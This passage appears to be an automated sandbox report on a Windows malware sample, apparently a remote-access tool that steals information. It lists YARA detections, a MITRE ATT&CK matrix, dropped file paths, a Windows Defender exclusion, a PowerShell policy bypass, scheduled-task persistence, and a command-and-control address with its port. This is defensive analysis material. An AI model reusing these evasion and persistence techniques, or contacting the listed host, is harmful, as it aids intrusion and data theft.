                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15932.4492.exeCode function: 0_2_00007FF7E7694C14 GetSystemTimeAsFileTime,0_2_00007FF7E7694C14
                  Source: C:\WCTVN\mmytljldrgl.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                  Stealing of Sensitive Information

                  barindex
                  Source: Yara matchFile source: 24.0.mmytljldrgl.exe.450000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0000001B.00000002.2946566856.00000000034F9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000018.00000000.2059375290.0000000000770000.00000002.00000001.01000000.00000009.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000018.00000000.2051054943.0000000000452000.00000002.00000001.01000000.00000009.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000018.00000002.2118558871.000000001B2D2000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: mmytljldrgl.exe PID: 3156, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: Client.exe PID: 7328, type: MEMORYSTR
                  Source: Yara matchFile source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\mmytljldrgl[1].exe, type: DROPPED
                  Source: Yara matchFile source: C:\Users\user\AppData\Roaming\SubDir\Client.exe, type: DROPPED
                  Source: Yara matchFile source: C:\WCTVN\mmytljldrgl.exe, type: DROPPED

                  Remote Access Functionality

                  barindex
                  Source: Yara matchFile source: 24.0.mmytljldrgl.exe.450000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0000001B.00000002.2946566856.00000000034F9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000018.00000000.2059375290.0000000000770000.00000002.00000001.01000000.00000009.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000018.00000000.2051054943.0000000000452000.00000002.00000001.01000000.00000009.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000018.00000002.2118558871.000000001B2D2000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: mmytljldrgl.exe PID: 3156, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: Client.exe PID: 7328, type: MEMORYSTR
                  Source: Yara matchFile source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\mmytljldrgl[1].exe, type: DROPPED
                  Source: Yara matchFile source: C:\Users\user\AppData\Roaming\SubDir\Client.exe, type: DROPPED
                  Source: Yara matchFile source: C:\WCTVN\mmytljldrgl.exe, type: DROPPED
                  ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                  Gather Victim Identity InformationAcquire InfrastructureValid Accounts21
                  Windows Management Instrumentation
                  1
                  DLL Side-Loading
                  1
                  Exploitation for Privilege Escalation
                  11
                  Disable or Modify Tools
                  111
                  Input Capture
                  1
                  System Time Discovery
                  Remote Services1
                  Archive Collected Data
                  2
                  Ingress Tool Transfer
                  Exfiltration Over Other Network MediumAbuse Accessibility Features
                  CredentialsDomainsDefault Accounts1
                  Scheduled Task/Job
                  1
                  Scheduled Task/Job
                  1
                  DLL Side-Loading
                  1
                  Obfuscated Files or Information
                  LSASS Memory2
                  File and Directory Discovery
                  Remote Desktop Protocol111
                  Input Capture
                  11
                  Encrypted Channel
                  Exfiltration Over BluetoothNetwork Denial of Service
                  Email AddressesDNS ServerDomain Accounts1
                  PowerShell
                  Logon Script (Windows)11
                  Process Injection
                  1
                  DLL Side-Loading
                  Security Account Manager44
                  System Information Discovery
                  SMB/Windows Admin SharesData from Network Shared Drive1
                  Non-Standard Port
                  Automated ExfiltrationData Encrypted for Impact
                  Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook1
                  Scheduled Task/Job
                  1
                  Masquerading
                  NTDS131
                  Security Software Discovery
                  Distributed Component Object ModelInput Capture2
                  Non-Application Layer Protocol
                  Traffic DuplicationData Destruction
                  Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script51
                  Virtualization/Sandbox Evasion
                  LSA Secrets1
                  Process Discovery
                  SSHKeylogging113
                  Application Layer Protocol
                  Scheduled TransferData Encrypted for Impact
                  Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts11
                  Process Injection
                  Cached Domain Credentials51
                  Virtualization/Sandbox Evasion
                  VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                  DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
                  Hidden Files and Directories
                  DCSync1
                  Application Window Discovery
                  Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                  Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/JobIndicator Removal from ToolsProc Filesystem1
                  System Network Configuration Discovery
                  Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                  Hide Legend

                  Legend:

                  • Process
                  • Signature
                  • Created File
                  • DNS/IP Info
                  • Is Dropped
                  • Is Windows Process
                  • Number of created Registry Values
                  • Number of created Files
                  • Visual Basic
                  • Delphi
                  • Java
                  • .Net C# or VB.NET
                  • C, C++ or other language
                  • Is malicious
                  • Internet
                  behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1611954 Sample: SecuriteInfo.com.Win64.Malw... Startdate: 11/02/2025 Architecture: WINDOWS Score: 100 49 raw.githubusercontent.com 2->49 51 ipwho.is 2->51 53 github.com 2->53 75 Suricata IDS alerts for network traffic 2->75 77 Found malware configuration 2->77 79 Malicious sample detected (through community Yara rule) 2->79 81 10 other signatures 2->81 10 SecuriteInfo.com.Win64.MalwareX-gen.15932.4492.exe 17 2->10         started        15 Client.exe 2->15         started        signatures3 process4 dnsIp5 55 github.com 140.82.121.4, 443, 49737 GITHUBUS United States 10->55 57 raw.githubusercontent.com 185.199.110.133, 443, 49738 FASTLYUS Netherlands 10->57 45 C:\WCTVN\mmytljldrgl.exe, PE32 10->45 dropped 47 C:\Users\user\AppData\...\mmytljldrgl[1].exe, PE32 10->47 dropped 83 Adds a directory exclusion to Windows Defender 10->83 17 mmytljldrgl.exe 5 10->17         started        21 cmd.exe 1 10->21         started        23 cmd.exe 1 10->23         started        25 15 other processes 10->25 file6 signatures7 process8 file9 43 C:\Users\user\AppData\Roaming\...\Client.exe, PE32 17->43 dropped 63 Antivirus detection for dropped file 17->63 65 Multi AV Scanner detection for dropped file 17->65 67 Machine Learning detection for dropped file 17->67 73 2 other signatures 17->73 27 Client.exe 14 2 17->27         started        31 schtasks.exe 1 17->31         started        69 Adds a directory exclusion to Windows Defender 21->69 33 powershell.exe 23 21->33         started        35 powershell.exe 23 23->35         started        71 Bypasses PowerShell execution policy 25->71 signatures10 process11 dnsIp12 59 87.228.57.81, 4782, 49739 INF-NET-ASRU Russian Federation 27->59 61 ipwho.is 195.201.57.90, 443, 49740 HETZNER-ASDE Germany 27->61 85 Antivirus detection for dropped file 27->85 87 Multi AV Scanner detection for dropped file 27->87 89 Machine Learning detection for dropped file 27->89 93 2 other signatures 27->93 37 schtasks.exe 27->37         started        39 conhost.exe 31->39         started        91 Loading BitLocker PowerShell Module 33->91 signatures13 process14 process15 41 conhost.exe 37->41         started       

                  This section contains all screenshots as thumbnails, including those not shown in the slideshow.